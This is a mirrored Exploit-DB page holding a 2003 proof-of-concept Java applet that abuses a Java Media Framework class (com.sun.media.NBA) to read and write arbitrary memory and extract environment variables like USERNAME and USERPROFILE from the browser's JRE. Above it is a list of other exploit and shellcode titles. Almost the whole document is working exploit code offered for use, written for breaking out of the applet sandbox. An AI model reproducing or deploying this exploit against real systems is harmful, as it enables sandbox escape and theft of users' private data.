bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/local/22732.java
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

246 lines
No EOL
6.4 KiB
Java
Raw Blame History

source: https://www.securityfocus.com/bid/7824/info
It has been reported that the Sun Java Runtime Environment does not properly protect trusted java applets. Because of this, it may be possible for an attacker to use a malicious applet to gain access to sensitive information.
/*
Proof-Of-Concept: Read Environment via vulnerability Java Media Framework
(2003) Marc Schoenefeld, www.illegalaccess.org
*/
import com.sun.media.NBA;
import java.applet.Applet;
import java.awt.Graphics;
import javax.swing.JOptionPane;
class NBAFactory {
public static String getEnv(String a,long from, long to) {
long pos = findMem(a,from,to);
String ret = "";
if (pos != -1) {
long pos2 = pos+a.length();
ret = getString(pos2);
}
return ret;
}
public static String getString(long pos) {
int i = 0;
StringBuffer b = new StringBuffer();
char x = 0;
do {
x = (char) readMem(pos+i);
i++;
if (x != 0)
b.append(x);
} while (!(x == 0));
return b.toString();
}
public static long findMem(String a, long from , long to) {
char[] ch = a.toCharArray();
for (long pos = from; pos < to ;pos++) {
// System.out.println(pos-from+":");
int i = 0;
int found = 0;
for (i = 0; i < ch.length; i++) {
char x = (char) readMem(pos+i);
// System.out.println(pos+":"+x);
if (x == ch[i]) {
found ++;
}
else
break;
}
if (found == ch.length) {
return pos;
}
}
return -1;
}
public static byte readMem(long i) {
byte[] by = new byte[1];
NBA searcher = new NBA(byte[].class,1);
long olddata = searcher.data;
searcher.data = i;
searcher.size = 1;
searcher.copyTo(by);
searcher.data = olddata; // keep the finalizer happy
return by[0];
}
public static void setMem(long i, char c) {
NBA b = new NBA(byte[].class,1);
long olddata = b.data;
b.data = i;
b.size = 1;
theBytes[c].copyTo(b);
b.data = olddata; // keep the finalizer happy
}
public static void setMem(long i, byte by) {
setMem(i,(char) by);
}
public static void setMem(long i, int by) {
setMem(i,(char) by);
}
public static void setMem(long l, String s) {
char[] theChars = s.toCharArray();
NBA b = new NBA(byte[].class,1);
long olddata = b.data;
for (int i = 0 ; i < theChars.length; i++) {
b.data = l+i;
b.size = 1;
theBytes[theChars[i]].copyTo(b);
}
b.data = olddata; // keep the finalizer happy
}
private NBAFactory() {
}
public static NBA getByte(char i) {
return theBytes[i];
}
public static NBA getByte(int i) {
return theBytes[(char) i];
}
public static NBA[] getBytes() {
return theBytes;
}
static NBA[] theBytes = new NBA[256];
static {
for (char i = 0; i < 256; i++) {
// System.out.println((byte)i);
NBA n = search(i,0x6D340000L, 0x6D46A000L);
if (n!=null)
theBytes[i]= n;
else
System.exit(-1);
}
}
static NBA search (char theChar,long start, long end) {
NBA ret = null;
NBA searcher = new NBA(byte[].class,1);
byte[] ba = new byte[1];
for (long i = start; i < end ; i++) {
// byte b = readMem(i);
searcher.data = i;
searcher.copyTo(ba);
// if ( b == (byte)theChar) {
if ( ba[0] == (byte)theChar) {
return searcher;
}
}
return null;
}
}
public class ReadEnv extends Applet{
static NBA base = new NBA(byte[].class,18); // what's the base pointer ?
public static void crash(Object o) {
System.out.println("Proof-Of-Concept: Read Environment via vulnerability Java Media Framework");
System.out.println("(2003) Marc Schoenefeld, www.illegalaccess.org");
NBA ret = new NBA(byte[].class,4);
long oldret = ret.data;
System.out.println("Base of data: "+Long.toString(base.data,16));
String[] envs = {"USERDOMAIN","USERNAME","USERPROFILE","CLASSPATH",
"TEMP","COMSPEC","JAVA_HOME","Path","INCLUDE"};
for (int i = 0; i < envs.length; i++) {
String val = NBAFactory.getEnv(envs[i],base.data,base.data+32768);
if (!(o instanceof Applet)) {
System.out.println(envs[i]+":"+val);
}
else {
javax.swing.JOptionPane.showMessageDialog((java.applet.Applet) o,envs[i]+":"+val);
}
}
//NBAFactory.setMem(pos+10,'A');
try {
System.out.println(System.getProperty("java.class.path"));
java.util.Properties p = System.getProperties();
p.list(System.out);
}
catch (java.security.AccessControlException e) {
System.out.println("Cannot read environment via getProperties:"+e);
}
//System.out.println(pos);
//long pos2 = NBAFactory.findMem("mixed",base.data,base.data+6614096);
//System.out.println(pos2);
//byte[] x11 = new byte[8];
//ret.copyTo(x11);
//for (int i = 0; i < x11.length; i++) {
// System.out.println(i+":"+x11[i]+(char)x11[i]);
//}
ret.data = oldret;
//ret.data = 0xffff8000;
//ret.finalize();
//ret.finalize();
//NBAFactory.setMem(ret.data-0xffff8000,33);
//ret.finalize();
/*b.data = base.data;
b.size = 16384;*/
/*byte[] ba3 = new byte[16384];
b.copyTo(ba3);
for (int i = 0; i < ba3.length; i++) {
System.out.println(new Integer(i).toString(i,16)+":"+ba3[i]+(char)ba3[i]);
}*/
/*b.data = olddata;*/
}
public static void main(String[] a) {
crash(null);
}
public void paint(Graphics g) {
if (init == 0) {
init=1;
crash(this);
}
}
static int init = 0;
}
Reference in a new issue View git blame Copy permalink